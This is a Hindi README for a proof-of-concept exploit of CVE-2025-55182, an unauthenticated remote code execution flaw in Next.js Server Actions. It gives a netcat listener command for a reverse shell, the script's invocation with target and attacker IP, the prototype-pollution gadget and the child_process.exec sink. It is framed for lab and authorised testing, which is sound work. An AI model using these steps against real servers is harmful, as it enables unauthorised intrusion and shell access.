
मुझे पता है कि आप शायद Hack the Box से यहाँ आए हैं, अगर ऐसा है, तो हाँ, यह वास्तव में काम करता है।
CVE-2025-55182 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट, जो Next.js सर्वर एक्शन्स में एक बिना प्रमाणीकरण वाली रिमोट कोड एक्ज़ीक्यूशन (RCE) कमजोरी को लक्षित करता है।
यह एक्सप्लॉइट React सर्वर कंपोनेंट्स (RSC) मल्टीपार्ट पेलोड्स के डिसीरियलाइज़ेशन के दौरान प्रोटोटाइप पोल्यूशन का दुरुपयोग करता है, ताकि एक एसिंक्रोनस, नॉन-ब्लॉकिंग एक्ज़ीक्यूशन फ्लो का उपयोग करके Node.js प्रोसेस में दुर्भावनापूर्ण कमांड इंजेक्ट किए जा सकें।
execSync() API के बजाय child_process.exec() का उपयोग करता है।requests लाइब्रेरी का उपयोग करके निर्मित।अपने अटैकिंग होस्ट पर एक टर्मिनल खोलें और आने वाले रिवर्स कनेक्शन को पकड़ने के लिए एक netcat सॉकेट लिसनर खोलें:
nc -lvnp 4444
टारगेट बेस URL, अपना लोकल होस्ट इंटरफ़ेस IP, और अपना इच्छित लिसनर पोर्ट प्रदान करें:
python3 exploit.py <target_url> <your_ip> [your_port]
python3 exploit.py http://website.whatever:port x.x.x.x 4444
स्क्रिप्ट आवश्यक Next-Action रूटिंग हेडर के साथ सीधे एप्लिकेशन रूटिंग एंडपॉइंट पर एक क्राफ्टेड रॉ मल्टीपार्ट पेलोड भेजती है।
{"get":"$1:constructor:constructor"} के माध्यम से ऑब्जेक्ट कंस्ट्रक्शन सिग्नेचर का लाभ उठाकर, डिसीरियलाइज़र इंजन नेटिव ऑब्जेक्ट ट्री को पोल्यूट करता है। साथ में दिए गए पैरामीटर्स को प्रोसेस करते समय, यह दुर्भावनापूर्ण रूप से एम्बेडेड _response कॉन्टेक्स्ट ब्लॉक को एक इंस्ट्रक्शन क्यू के रूप में व्याख्या करता है, जिससे चल रहे Node सर्वर यूज़र कॉन्टेक्स्ट के विशेषाधिकारों के तहत कोड एक्ज़ीक्यूशन संभव होता है।
// अंतर्निहित वेक्टर टारगेट:
process.mainModule.require('child_process').exec('your_payload_here');
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों, अधिकृत सुरक्षा परीक्षण, और Hack The Box जैसी लैब्स पर कमजोर फ्लैग्स कैप्चर करने के लिए बनाई गई है। लेखक इस उपयोगिता के किसी भी दुरुपयोग, अनधिकृत सिस्टम घुसपैठ, या हुए नुकसान के लिए जिम्मेदार नहीं है।